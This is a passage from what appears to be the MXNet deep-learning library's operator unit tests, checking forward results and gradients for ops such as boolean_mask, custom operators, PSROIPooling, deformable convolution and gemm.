x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
# helper function to identify inputs likely to fail check_numeric_gradient tol test
# due to finite difference method inaccuracies or function discontuities at the origin
def bad_input_finder(f, f_grad, dtype):
eps = default_numeric_eps()[np.dtype(dtype)]
rtol = default_rtols()[np.dtype(dtype)]
def expected_relative_error(x):
fd_gradient = (f(x+eps/2) - f(x-eps/2)) / eps
return abs(fd_gradient/f_grad(x) - 1)
def is_fd_problem_input(x):
return abs(x) < eps/2 or expected_relative_error(x) > rtol
return np.vectorize(is_fd_problem_input)
def test_reciprocal_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.reciprocal,
lambda x: -np.reciprocal(x)**2, np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
def test_cbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.cbrt,
lambda x: 1./(3 * np.cbrt(x)**2), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
def test_rcbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(lambda x: 1./np.cbrt(x),
lambda x: -1./(3 * np.cbrt(x)**4), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@pytest.mark.parametrize('num_batch', [1, 2])
@pytest.mark.parametrize('num_channel_data_deformable_group', itertools.product([4, 8], [1, 2]))
@pytest.mark.parametrize('input_height_width', itertools.product([5, 6], [5, 6]))
@pytest.mark.parametrize('dilate', [(1, 1), (2, 2)])
@pytest.mark.parametrize('grad_nodes', [['im_data'], ['offset_data'], ['weight']])
def test_deformable_convolution(num_batch, num_channel_data_deformable_group, input_height_width,
dilate, grad_nodes):
num_channel_data, num_deformable_group = num_channel_data_deformable_group
input_height, input_width = input_height_width
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data").as_np_ndarray()
offset_data_var = mx.symbol.Variable(name="offset_data").as_np_ndarray()
weight_var = mx.symbol.Variable(name="weight").as_np_ndarray()
bias_var = mx.symbol.Variable(name="bias").as_np_ndarray()
op = mx.sym.npx.deformable_convolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0), numeric_eps=1.0/64)
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = None, atol_fw = None,
rtol_bw = None, atol_bw = None, num_eps = None):
def np_random_data(shape, dtype=np.float32):
return np.random.uniform(low=-0.5,
high=0.5, size=shape).astype(dtype)
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np_random_data(shape1, dtype)
data_in2 = np_random_data(shape2, dtype)
data_in3 = np_random_data(shape3, dtype)
data_in4 = np_random_data(shape4, dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
def test_gemm():
_gemm_test_helper(np.float64, True)
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '0'):
_gemm_test_helper(np.float32, True)
if default_context().device_type == 'gpu':
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '1'):
_gemm_test_helper(np.float32, True)
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
